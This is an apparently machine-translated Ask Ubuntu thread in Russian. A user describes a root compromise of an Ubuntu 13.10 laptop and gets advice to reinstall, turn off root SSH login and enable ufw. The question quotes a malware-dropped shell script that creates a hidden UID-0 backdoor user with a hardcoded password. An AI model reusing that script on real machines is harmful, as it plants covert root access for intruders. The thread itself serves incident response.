Как бороться с вредоносными программами на моем ноутбуке?

12

Я совершенно уверен, что мой ноутбук Ubuntu 13.10 заражен каким-то вредоносным ПО.

Время от времени я нахожу процесс / lib / sshd (принадлежащий root) работающим и потребляющим много процессора. Это не сервер sshd, который запускает / usr / sbin / sshd.

Двоичный файл имеет разрешения --wxrw-rwt и генерирует и порождает сценарии в каталоге / lib. Недавний называется 13959730401387633604, и он делает следующее

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Пользователь gusr был создан вредоносной программой независимо друг от друга, а затем chpasswd зависает, потребляя 100% ресурсов процессора.

До сих пор я обнаружил, что пользователь gusr был дополнительно добавлен в файлы в / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Похоже, что вредоносная программа сделала копии всех этих файлов с суффиксом "-". Полный список файлов / etc /, которые были изменены пользователем root, доступен здесь .

Кроме того, файл / etc / hosts был изменен на this .

/ Lib / sshd начинается с добавления себя в конец файла /etc/init.d/rc.local!

Я удалил пользователя, удалил файлы, убил дерево обработанных, изменил мои пароли и удалил открытые ключи ssh.

Я знаю, что я в основном облажался, и я, скорее всего, переустановить всю систему. Тем не менее, поскольку я подключаюсь к нескольким другим машинам, было бы хорошо, по крайней мере, попытаться удалить его и выяснить, как я его получил. Будем благодарны за любые предложения о том, как это сделать.

Похоже, что они вошли 25 марта путем принудительного входа в систему root. Я понятия не имел, что root ssh по умолчанию включен в Ubuntu. Я отключил это и поднял denyhosts.

Логин был от 59.188.247.236, где-то в Гонконге, видимо.

Я получил ноутбук от EmperorLinux, и они включили root-доступ. Если у вас есть один из них, и вы используете sshd, будьте осторожны.

security malware Деян Йованович
источник
2
Отключите свою машину от сети! Сейчас!
Сет
2
И почему у вас включен root-логин? Это то, что вы не должны включать без уважительной причины.
Сет
@ Я не включил его, он был включен по умолчанию в Ubuntu. Я так же удивлен, как и вы.
Деян Йованович
1
См. « По умолчанию демон SSH поставляется с включенным удаленным входом в систему root. Обычно Ubuntu не разрешает прямой доступ пользователю root, поэтому этот параметр не важен. Если вы установили пароль для учетной записи root, этот параметр может быть потенциальным риск для безопасности, и должен быть отключен. "
Сет
1
Я вполне уверен, что это не так Linux/Ebury. Это что-то еще, и, возможно, имя не назначено. Ebury не создавал бы новую учетную запись пользователя и изменил бы общую библиотеку, используемую openssh, а не был добавлен в новый двоичный файл с именем sshd.
Riking

Ответы:

11

Во-первых, отключите эту машину от сети сейчас!

Во-вторых, почему у вас включена учетная запись root? Вы действительно не должны активировать учетную запись root, если у вас нет веских причин для этого.

В-третьих, да, единственный способ убедиться, что вы чисты, - это выполнить чистую установку. Также рекомендуется начать все сначала и не возвращаться к резервной копии, так как вы никогда не можете быть уверены, когда все это началось.

Я также предлагаю вам установить брандмауэр при следующей установке и запретить все входящие подключения: 

sudo ufw default deny incoming

и затем разрешить SSH с: 

sudo ufw allow ssh

и не включайте учетную запись root! Конечно убедитесь , что корень SSH Войти отключен.

Сет
источник
4
Я проверил учетную запись root. Я получил ноутбук от Emperorlinux, и они позволили учетной записи настроить его. Тупой.
Деян Йованович
1
@ DejanJovanović Это ужасно!
Сет